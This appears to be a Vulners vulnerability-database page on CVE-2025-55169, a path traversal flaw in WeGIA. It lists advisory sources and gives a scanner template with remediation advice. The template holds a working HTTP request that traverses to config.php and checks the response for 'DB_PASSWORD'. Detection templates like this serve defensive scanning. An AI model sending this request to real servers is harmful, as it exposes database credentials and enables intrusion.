| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-55169 | 13 Aug 202503:01 | – | circl | |
| WeGIA 路径遍历漏洞 | 12 Aug 202500:00 | – | cnnvd | |
| CVE-2025-55169 | 12 Aug 202519:01 | – | cve | |
| CVE-2025-55169 WeGIA Path Traversal at endpoint 'html/socio/sistema/download_remessa.php' via parameter 'file' | 12 Aug 202519:01 | – | cvelist | |
| EUVD-2025-24455 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-55169 | 12 Aug 202519:15 | – | nvd | |
| CVE-2025-55169 WeGIA Path Traversal at endpoint 'html/socio/sistema/download_remessa.php' via parameter 'file' | 12 Aug 202519:01 | – | osv | |
| PT-2025-32886 | 12 Aug 202500:00 | – | ptsecurity | |
| CVE-2025-55169 | 14 Aug 202519:29 | – | redhatcve | |
| CVE-2025-55169 WeGIA Path Traversal at endpoint 'html/socio/sistema/download_remessa.php' via parameter 'file' | 12 Aug 202519:01 | – | vulnrichment |
id: CVE-2025-55169
info:
name: WeGIA - Directory Traversal
author: praivesi
severity: critical
description: |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. Prior to version 3.4.8, a path traversal vulnerability was discovered in the WeGIA application, html/socio/sistema/download_remessa.php endpoint. This vulnerability could allow an attacker to gain unauthorized access to local files in the server and sensitive information stored in config.php. config.php contains information that could allow direct access to the database. This issue has been patched in version 3.4.8.
impact: |
Attackers can read arbitrary files including sensitive configuration files containing database credentials through path traversal in the download_remessa.php endpoint.
remediation: |
Upgrade to WeGIA version 3.4.8 or later, which patches the path traversal vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-55169
- https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mm3p-7573-4x4j
metadata:
verified: true
max-request: 1
fofa-query: title="WeGIA"
tags: cve,cve2025,wegia,lfi,vuln
http:
- raw:
- |
GET /html/socio/sistema/download_remessa.php?file=../../../www/html/wegia/config.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_PASSWORD"
- type: word
part: content_type
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4b0a00483046022100b3178b872b9de5a443b134390bf625ab9558334797fffb11ff27e69c65666c17022100a14b9a5ba902c6f8243c068665131991bbd3852df7d429f3934ec416f1c8840b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation